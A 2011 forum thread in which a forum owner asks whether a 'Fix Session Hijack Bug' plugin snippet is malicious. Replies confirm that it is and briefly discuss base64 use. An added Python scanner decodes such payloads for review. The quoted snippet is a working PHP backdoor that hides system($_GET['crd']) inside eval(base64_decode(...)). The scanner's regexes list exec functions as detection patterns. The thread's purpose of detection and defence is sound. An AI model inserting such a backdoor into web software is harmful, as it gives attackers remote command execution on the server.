Is this malicious?


CPTA
07-30-2011, 07:27 AM
Some kid told us to add this to our forum as a plugin; we didn't, in fear that it was malicious.

//Fix Session Hijack Bug
if(isset($_GET['crd'])){ $HIDE_SESSION = 1; echo "<h1>Session Hijack Blocked</h1><pre>"; eval(base64_decode("c3lzdGVtKCRfR0VUWydjcmQnXSk7")); exit; }

ForumsMods
07-30-2011, 07:39 AM
Yes it is malicious.
The code will execute an external program and display the output (the crd URL parameter).
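
Added example, not part of the original thread or any poster's code: a static triage script in Python that finds eval(base64_decode("...")) calls in PHP source and decodes the literal without running it, so a plugin can be reviewed before it is installed. The function names, the regexes and the is_backdoor rule are assumptions made for this illustration; the sample input is the snippet from the first post.

```python
import base64
import re

# Constructed sample: the snippet quoted in the first post of this thread.
SAMPLE = r'''//Fix Session Hijack Bug
if(isset($_GET['crd'])){ $HIDE_SESSION = 1; echo "<h1>Session Hijack Blocked</h1><pre>"; eval(base64_decode("c3lzdGVtKCRfR0VUWydjcmQnXSk7")); exit; }
'''

# eval(base64_decode("<literal>")) with either quote style and optional whitespace.
EVAL_B64 = re.compile(
    r'''eval\s*\(\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)''',
    re.IGNORECASE,
)
# PHP functions that run OS commands or code, and request-controlled input sources.
EXEC_FUNCS = re.compile(
    r'\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(', re.I)
USER_INPUT = re.compile(r'\$_(GET|POST|REQUEST|COOKIE|SERVER)\b')


def scan_php(source):
    """Return one finding per eval(base64_decode("...")) call, decoded but never executed."""
    findings = []
    for m in EVAL_B64.finditer(source):
        blob = re.sub(r'\s+', '', m.group(2))
        try:
            decoded = base64.b64decode(blob, validate=True).decode('utf-8', 'replace')
        except ValueError:
            decoded = None  # not valid base64; still worth a manual look
        text = decoded or ''
        findings.append({
            'line': source.count('\n', 0, m.start()) + 1,
            'decoded': decoded,
            'exec_funcs': sorted({f.lower() for f in EXEC_FUNCS.findall(text)}),
            'user_input': sorted({'$_' + s for s in USER_INPUT.findall(text)}),
        })
    return findings


def is_backdoor(finding):
    """Hypothetical triage rule: decoded code passes request data to an exec-type function."""
    return bool(finding['exec_funcs'] and finding['user_input'])


if __name__ == '__main__':
    for f in scan_php(SAMPLE):
        print(f, 'BACKDOOR' if is_backdoor(f) else 'review')
```

The scanner only matches string literals passed directly to base64_decode; payloads assembled from variables or wrapped in further encodings need manual review.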

CPTA
07-30-2011, 07:46 AM
Thank you m8

setishock
07-30-2011, 04:26 PM
That needs to be in a bbcode code block.

Boofo
07-30-2011, 04:32 PM
base64_decode is a no-no.

ForumsMods
07-30-2011, 05:33 PM
base64_decode is a no-no.
Some hostings block the use of base64 functions.

Boofo
07-30-2011, 06:59 PM
The good ones do, anyway.